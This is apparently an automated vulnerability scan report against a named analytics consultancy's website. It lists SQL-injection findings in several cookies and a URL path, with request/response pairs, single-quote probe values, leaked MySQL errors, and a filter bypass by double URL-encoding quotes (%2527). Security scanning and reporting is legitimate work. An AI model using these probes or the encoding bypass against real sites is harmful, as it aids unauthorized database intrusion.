GET /blog/googleanalytics/106-google-analytics-health-check.html%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:22:44 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:22:46 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:22:47 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em> ...[SNIP]...
Request 2
GET /blog/googleanalytics/106-google-analytics-health-check.html%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 06:22:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:04:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:04:40 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:04:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26246
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em> ...[SNIP]...
Request 2
GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:04:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:10:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:10:25 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:10:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26334
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em> ...[SNIP]...
Request 2
GET /blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:10:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:14:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:22 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:14:22 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 26246
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em> ...[SNIP]...
Request 2
GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=5 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:14:22 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:44:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:44:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:46:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:46:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:46:40 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:46:41 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 39301
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog%2527/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 05:56:38 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 05:56:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /blog%2527%2527/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:56:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:38:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
